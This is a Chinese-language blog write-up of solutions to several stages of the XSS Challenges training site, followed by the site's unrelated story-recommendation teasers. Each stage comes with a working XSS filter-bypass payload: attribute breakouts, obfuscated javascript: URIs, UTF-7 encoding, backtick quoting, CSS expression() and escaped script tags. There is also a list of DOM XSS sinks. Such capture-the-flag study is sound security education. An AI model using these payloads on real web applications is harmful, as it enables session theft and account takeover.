XSS Challenges部分题目总结

怎样进行Xss攻击


XSS Challenges:http://xss-quiz.int21h.jp/
这是一个日本的孩子写得xss测试关卡,一共19关。

第四关:http://xss-quiz.int21h.jp/stage_4.php?sid=04fb39847db7e3f24b1287a4be7e22b1ba79ec74

Hint: invisible input field
抓包发现有三个参数,通过测试发现前两个都被过滤了关键字符,而第三个没有过滤。

图片.png
图片.png
用第三个参数构造闭合语句
1"><img src=1 onerror= alert(document.domain)>
图片.png

第六关:http://xss-quiz.int21h.jp/stage-no6.php?sid=10284e95452262a58b13c86015336f4489b6152e

输入<>/"发现<>被过滤,可以在input中构造onxxx语句。

图片.png

1" onclick="alert(document.domain)
图片.png

第八关:http://xss-quiz.int21h.jp/stage008.php?sid=8407d42ea5cf46b072f5a358abffa591a449a2ba

提示:the 'javascript' scheme.
<>"\都被过滤了,但是可以用JS的伪协议,点击链接弹窗

图片.png

javascript:alert(document.domain)
图片.png

第九关:http://xss-quiz.int21h.jp/stage_09.php?sid=fcf3010be4306306e9668ee51b9d6916c0b3e129

提示:UTF-7 XSS
XSS事项 UTF-7: 消失的字符集
IE6/7 UTF7 XSS 漏洞攻击,这个攻击只对 IE6/IE7 起作用, 从 IE8 起微软已经修复了

"<>都被转义了,当然也不能用onmouseover和onclick,根据提示,用UTF-7编码解码工具,将" onmousemove="alert(document.domain)转为UTF-7编码:
p1=1%2bACI- onmouseover=%2bACI-alert(document.domain)%2bADsAIg- x=%2bACI-&charset=UTF-7

这个对使用的IE浏览器有一定的限制,大部分浏览器都已经修复了这个漏洞,但IE7还没有

第十一关:http://xss-quiz.int21h.jp/stage11th.php?sid=4a4c328baf358d9bf01befc79228e70d25549025

提示:s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;
没有过滤<>"/,
1,script会被替换为xscript 
2,on事件会被替换为onxxx
3,style会被替换为stxxx

图片.png
图片.png

所以只能用a标签,<a href="javascript:alert(document.domain)">123</a>,可是还是有script,所以要将script中的某个字符转为unicode编码,或者可以插入&#09;不可见字符。
尝试用tab制表(%09),换行(%0a,%0d,%0a%0d)等符号都不行。

输入"><a href=javascri%09pt:alert(1)>test</a>,显示发现后面的那一段被截断了。
图片.png

%09也就是tab制表符,使用在单个标签之内,会被浏览器正确去除,而在跨标签的时候(也就是闭合前面原有标签,使用在构造者构造的新标签的时候)不会被正确去除。也仅仅是%09,其十进制编码和十六进制编码都不会受影响。后面测试发现%0a和%0d一样受到影响。
参考payload:
"><a href=javascri&#09pt:alert(document.domain)>test</a> //&#09 tab制表符html十进制编码
"><a href=javascri&NewLine;pt&colon;alert(document.domain)>test</a> //&NewLine;是html5的换行符,&colon;是冒号

HTML的16进制转义符 HTML Punctuation Special Characters

第十二关:http://xss-quiz.int21h.jp/stage_no012.php?sid=66a49c46b3d8e490003681f359c7b8b14ba174c8

提示:s/[\x00-\x20&lt;&gt;"']//g;
<>"被过滤,根据提示可以知道x00-,x20,<,>,",'都被过滤了,但是`还没被过滤,于是可以用`加上onclick,onmouseover,onfocus均可,还有一个前提是IE,只有IE才有这个特性

图片.png

由于IE的特性,或者说浏览器竞争时代百家争鸣导致的结果,会把`解析为引号。

第十三关:http://xss-quiz.int21h.jp/stage13_0.php?sid=ea59af045ae260dd938d73d6cbbd1c92a6806e06

提示:style attribute6
css中的expression
支持者:IE5至IE7浏览器。expression这个语法只存在ie上。

xss:expr/*XSS*/ession(alert(document.domain));
还有一种:
background-color:#f00;background:url("javascript:alert(document.domain);");

现实环境中不可能有如此简单就能插入的地方
话说,现实中怎么利用
有2种注入:

(1)@import 和 expression

    @import "http://web/xss.css"  
    @import 'javascript:alert("xss")'  
    body{xss:expression(alert('xss'))]  
    <img style="xss:expression(alert('xss'))">  

(2)css代码中js,vs脚本

    body{backgroud-image:url(javascript:alert('xss'))}  
    body{backgroud-image:url(vbscript:msgbox('xss'))}  

第十五关:http://xss-quiz.int21h.jp/stage__15.php?sid=1e785fb96bdb203c00b034203ee574681d1b4403

提示:document.write();
输入<>"/发现<>"被过滤了

图片.png

有几种绕过过滤的方法:
第一种:换成16进制编码\x3cscript\x3ealert(document.domain);\x3c/script\x3e
第二种:换成Unicode编码\u003cscript\u003ealert(document.domain);\u003c/script\u003e
第三种:换成十进制编码\74script\76alert(document.domain);\74/script\76
(两个\是因为过滤了单个)

能引起Dom XSS的入口函数总结

    document.write()    
    document.writeln()    
    document.body.innerHtml    
    eval()    
    window.execScript()    
    window.setInterval()    
    window.setTimeout()   

第十七关:http://xss-quiz.int21h.jp/stage-No17.php?sid=a207c91d7b4cb2634e277df104c853554347e8ca

提示:multi-byte character
Multi-Byte Character Set & Use Unicode Character Set
(浏览器版本问题不能成功,IE8已经修复)双引号是0x22,总体思路类似宽字节注入,这个技巧在sql注入中很常用,如%0c可以吃掉一个反斜杠,就是用一个特殊字节吃掉Name中的第二个",然后Name和E-mail的第一个"就闭合构成了value,然后插入onxxx,最后再吃掉最后一的"。

图片.png
图片.png

抓包payloadp1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7

第十八关:http://xss-quiz.int21h.jp/stage__No18.php?sid=b23d6719a639f5655a2966a2f5ade6ec86841851

提示:us-ascii high bit issue
这个源自于浏览器瞎解释,他会把一些8位的字符直接解释成7位ascii(漏洞已经在IE8中修补了)

图片.png

就是说浏览器会忽略掉一些8位字符的第一位,如BC和<2进制的后7位相同,浏览器会把他当做BC,并不会过滤。(二进制和16进制可以和字符间相互转换)
参考文献
https://blog.csdn.net/emaste_r/article/details/16988167
https://www.cnblogs.com/sherlock17/p/6700430.html

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,324评论 5 476
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,303评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,192评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,555评论 1 273
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,569评论 5 365
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,566评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,927评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,583评论 0 257
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,827评论 1 297
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,590评论 2 320
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,669评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,365评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,941评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,928评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,159评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,880评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,399评论 2 342

推荐阅读更多精彩内容